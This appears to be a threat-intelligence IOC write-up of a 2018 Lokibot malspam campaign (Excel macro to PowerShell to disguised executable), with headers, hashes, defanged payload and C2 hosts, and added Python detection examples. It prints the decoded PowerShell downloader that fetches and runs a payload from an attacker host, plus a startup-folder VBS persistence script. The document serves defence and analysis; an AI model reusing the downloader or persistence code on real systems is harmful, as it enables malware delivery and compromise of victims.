#IOC #OptiData #VR #Lokibot #X97M #macro #powershell
https://pastebin.com/LPqjHUkQ
FAQ:
https://radetskiy.wordpress.com/?s=lokibot
attack_vector
--------------
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe
email_headers
--------------
Received: from gunimo.com ([159.65.179.93])
    by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
    for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
    (envelope-from replymail202@gmail.com)
Received: from [103.99.1.148] (helo=User)
    by gunimo.com with esmtpa (Exim 4.84_2)
    (envelope-from <replymail202@gmail.com>)
    id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
Reply-To: <replymail202@gmail.com>
From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
Subject: Purchase Order (BESTLABS)
Date: Tue, 16 Oct 2018 06:35:11 -0700
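The header chain above carries two triage signals a mail gateway or analyst can score automatically: the submitting host announced itself with the bare HELO name "User" (not an FQDN), and a gmail.com sender was injected through gunimo.com rather than Google infrastructure. The following Python is an added example (not part of the IOC paste) that unfolds the headers, parses each Received hop, and flags those conditions; the folding whitespace in the sample is restored by hand from the listing, and the two heuristics are this example's own, not something the paste states.

```python
"""Triage of a Received-header chain: added example, not part of the IOC paste."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the headers from the IOC listing with their original
# folding whitespace (leading tabs on continuation lines) restored.
SAMPLE_HEADERS = """\
Received: from gunimo.com ([159.65.179.93])
\tby mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
\tfor <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
\t(envelope-from replymail202@gmail.com)
Received: from [103.99.1.148] (helo=User)
\tby gunimo.com with esmtpa (Exim 4.84_2)
\t(envelope-from <replymail202@gmail.com>)
\tid 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
Reply-To: <replymail202@gmail.com>
From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
Subject: Purchase Order (BESTLABS)
Date: Tue, 16 Oct 2018 06:35:11 -0700

"""

FROM_RX = re.compile(r"^from\s+(\S+)", re.I)
IP_RX = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RX = re.compile(r"helo=([^\s)]+)", re.I)
BY_RX = re.compile(r"\bby\s+(\S+)", re.I)
ENV_RX = re.compile(r"envelope-from\s+<?([^\s<>()]+)", re.I)
ADDR_RX = re.compile(r"<([^<>]+)>")


def unfold_headers(raw: str) -> List[Tuple[str, str]]:
    """Join RFC 5322 folded continuation lines; stop at the blank line."""
    headers: List[List[str]] = []
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[:1] in " \t" and headers:
            headers[-1][1] += " " + line.strip()
        else:
            name, _, value = line.partition(":")
            headers.append([name.strip(), value.strip()])
    return [(n, v) for n, v in headers]


def parse_received(value: str) -> Dict[str, Optional[str]]:
    """Pull the fields a triage needs out of one unfolded Received header."""
    def first(rx: "re.Pattern[str]") -> Optional[str]:
        m = rx.search(value)
        return m.group(1) if m else None
    m = FROM_RX.match(value)
    return {
        "from": m.group(1) if m else None,
        "ip": first(IP_RX),
        "helo": first(HELO_RX),
        "by": first(BY_RX),
        "envelope_from": first(ENV_RX),
    }


def same_or_subdomain(host: str, domain: str) -> bool:
    host, domain = host.lower().rstrip("."), domain.lower()
    return host == domain or host.endswith("." + domain)


def triage_headers(raw: str) -> Dict[str, object]:
    hdrs = unfold_headers(raw)
    received = [v for n, v in hdrs if n.lower() == "received"]
    hops = [parse_received(v) for v in received]
    # Received headers are prepended on each hop, so the last one is the submission hop.
    origin = hops[-1]
    from_val = next((v for n, v in hdrs if n.lower() == "from"), "")
    m = ADDR_RX.search(from_val)
    from_addr = (m.group(1) if m else from_val).strip().lower()
    sender_domain = from_addr.rsplit("@", 1)[-1]

    findings: List[str] = []
    helo = origin["helo"]
    if helo and "." not in helo:
        findings.append("generic_helo")  # e.g. helo=User: not an FQDN
    relay = origin["by"]
    if relay and not same_or_subdomain(relay, sender_domain):
        findings.append("sender_domain_relay_mismatch")  # gmail.com sender injected via a non-Google relay
    env = origin["envelope_from"]
    if env and env.lower() != from_addr:
        findings.append("envelope_from_mismatch")
    return {
        "origin_ip": origin["ip"],
        "origin_helo": helo,
        "injecting_relay": relay,
        "sender_domain": sender_domain,
        "findings": findings,
    }


if __name__ == "__main__":
    print(triage_headers(SAMPLE_HEADERS))
```

The relay-mismatch check is a heuristic, not an SPF result: legitimate mail does pass through third-party relays, so treat it as a scoring input alongside the generic HELO and the content indicators rather than a verdict on its own.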
email_subjects
--------------
Purchase Order (BESTLABS)
files
--------------
SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
File name 87041166.xls
File size 61 KB
SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
File name chri1.jpg (PE executable: "This program must be run under Win32")
File size 661 KB
activity
**************
payload
181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
C2
103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php
netwrk
--------------
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
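The two network lines above give three independent detection hooks: the IOC host/IP pairs, a GET for an "image" with no User-Agent (PowerShell's WebClient sends none unless the script sets one), and the fixed Lokibot User-Agent on the C2 POST. The Python below is an added example (not code from the paste) that runs those checks over a constructed, tab-separated proxy log; the log format is an assumption, and the IOC hosts are kept in the paste's defanged form and refanged only in memory.

```python
"""Detection over constructed proxy log lines; added example, not part of the paste."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicators copied from the IOC listing above (hosts kept defanged, refanged at load).
DEFANGED_HOSTS = ["octap{.} igg{.} biz", "octone{.} igg{.} biz"]
IOC_IPS = {"181.174.165.161", "103.109.184.60"}
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
# Extensions a second-stage binary is commonly hidden behind (here chri1.jpg is a PE).
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")


def refang(host: str) -> str:
    """'octap{.} igg{.} biz' -> 'octap.igg.biz' (the paste's defanging style)."""
    return host.replace("{.}", ".").replace(" ", "").lower()


IOC_HOSTS = {refang(h) for h in DEFANGED_HOSTS}

# Constructed sample log (assumed format, not from the paste), tab-separated:
# ts  src  dst  method  host  path  version  ua ("-" when the request had none)
FIELDS = ("ts", "src", "dst", "method", "host", "path", "version", "ua")
FF_UA = "Mozilla/5.0 (Windows NT 6.1; rv:62.0) Gecko/20100101 Firefox/62.0"
SAMPLE_LOG = [
    "\t".join(["2018-10-17T17:01:00", "10.0.0.5", "93.184.216.34", "GET", "example.com", "/", "HTTP/1.1", FF_UA]),
    "\t".join(["2018-10-17T17:02:10", "10.0.0.5", "181.174.165.161", "GET", refang("octap{.} igg{.} biz"), "/01/chri1.jpg", "HTTP/1.1", "-"]),
    "\t".join(["2018-10-17T17:03:30", "10.0.0.5", "103.109.184.60", "POST", refang("octone{.} igg{.} biz"), "/chri1/cgi.php", "HTTP/1.0", LOKIBOT_UA]),
    "\t".join(["2018-10-17T17:04:00", "10.0.0.5", "203.0.113.7", "GET", "cdn.example.net", "/img/logo.jpg", "HTTP/1.1", FF_UA]),
]


@dataclass
class Hit:
    line_no: int
    host: str
    reasons: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into named fields; None for malformed lines."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def inspect(rec: Dict[str, str]) -> List[str]:
    """Return every detection reason that fires on one record, in a fixed order."""
    reasons: List[str] = []
    if rec["host"].lower() in IOC_HOSTS:
        reasons.append("ioc_host")
    if rec["dst"] in IOC_IPS:
        reasons.append("ioc_ip")
    ua = rec["ua"]
    # PowerShell's WebClient sends no User-Agent unless the script sets one,
    # so an image fetch with an empty UA matches the first-stage download.
    if rec["method"] == "GET" and ua in ("", "-") and rec["path"].lower().endswith(IMAGE_EXT):
        reasons.append("no_ua_image_fetch")
    if ua == LOKIBOT_UA:
        reasons.append("lokibot_ua")
    return reasons


def scan(lines) -> List[Hit]:
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect(rec)
        if reasons:
            hits.append(Hit(n, rec["host"], reasons))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h)
```

The empty-UA rule is the one that keeps working after the infrastructure rotates: the hosts and IPs here will be gone soon, but an image-extension GET with no User-Agent from a workstation is rare enough to be worth an alert on its own.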
comp
--------------
powershell.exe 1148 181.174.165.161 80 ESTABLISHED
[System Process] 0 103.109.184.60 80 TIME_WAIT
[System Process] 0 103.109.184.60 80 TIME_WAIT
iigyhe.exe 2364 103.109.184.60 80 ESTABLISHED
proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
"C:\Users\operator\MyP8Mihuih.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
base64_decode
---------------
# decoded -En payload: downloader, first argument URL, second argument local path
function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
{
    (New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
    (New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL );
}
# fetch the disguised PE into %USERPROFILE% and run it; any error is swallowed
try{
    $mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
    D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
}catch{}
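The proc listing shows why the decode step matters: the command line only exposes "PowErSHeLl -En ..." and the downloader is visible after base64-decoding the UTF-16LE blob. The Python below is an added example (not code from the paste) that pulls the blob out of a process command line, decodes it, and reports the API names and URLs an analyst would pivot on. The sample script and command line are constructed stand-ins with placeholder names and a reserved `.invalid` URL, modelled on the decoded downloader above; the switch-prefix matching (`-e`, `-en`, `-enc` all meaning `-EncodedCommand`) is this example's assumption about how powershell.exe resolves abbreviated switches.

```python
"""Decode and triage a PowerShell -EncodedCommand blob; added example, not the paste's code."""
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for the decoded downloader above: same structure
# (WebClient.DownloadFile into %USERPROFILE%, then ShellExecute), placeholder names and URL.
SAMPLE_SCRIPT = (
    "function Get-And-Run ($u, $p) { "
    "(New-Object System.Net.WebClient).DownloadFile($u, $p); "
    "(New-Object -com Shell.Application).ShellExecute($p); }\n"
    "try { $t = $env:USERPROFILE + '\\stage.exe'; "
    "Get-And-Run 'http://payload.example.invalid/01/stage.jpg' $t } catch {}"
)


def encode_command(script: str) -> str:
    """powershell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line mirroring the mixed-case form in the proc listing.
SAMPLE_CMDLINE = "C:\\Windows\\SysWOW64\\cMD.exe cMD & /C PowErSHeLl -En " + encode_command(SAMPLE_SCRIPT)

ENCODED_FLAG = "-encodedcommand"


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the token after any prefix of -EncodedCommand (-e, -en, -enc, ...).
    Assumption: this mirrors how powershell.exe resolves abbreviated switches;
    the match is case-insensitive because the sample uses 'PowErSHeLl -En'."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t[:1] in "-/" and len(t) >= 2 and ENCODED_FLAG.startswith("-" + t[1:]):
            return tokens[i + 1]
    return None


def decode_encoded(blob: str) -> str:
    """Base64 -> UTF-16LE text; tolerates quoting and stripped '=' padding."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


# Static indicators of a download-and-execute stage, checked in this order.
INDICATORS = {
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download": re.compile(r"\.Download(File|String|Data)\s*\(", re.I),
    "execute": re.compile(r"ShellExecute|Start-Process|Invoke-Item", re.I),
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "userprofile": re.compile(r"\$env:(USERPROFILE|APPDATA|TEMP)\b", re.I),
}
URL_RX = re.compile(r"https?://[^\s'\"]+", re.I)


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the encoded command (if any) and list matched indicators and URLs."""
    blob = extract_encoded(cmdline)
    if blob is None:
        return {"encoded": False, "script": None, "indicators": [], "urls": []}
    script = decode_encoded(blob)
    found = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"encoded": True, "script": script, "indicators": found, "urls": URL_RX.findall(script)}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["indicators"], result["urls"])
    print(result["script"])
```

Feed it the command-line field from process-creation telemetry (Sysmon event 1 or 4688 with command-line auditing enabled); the decoded script, not the blob, is what should land in the alert so the URL and drop path are searchable.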
persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 17.10.2018 17:03
iihge.vbs c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs 17.10.2018 17:03
vbs
--------------
' Startup-folder launcher: runs the dropped Lokibot binary at each logon
Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""
drop
--------------
C:\Users\operator\MyP8Mihuih.exe
C:\Users\operator\AppData\Roaming\39B01F
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
C:\Users\operator\AppData\Roaming\iihge
# # #
https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4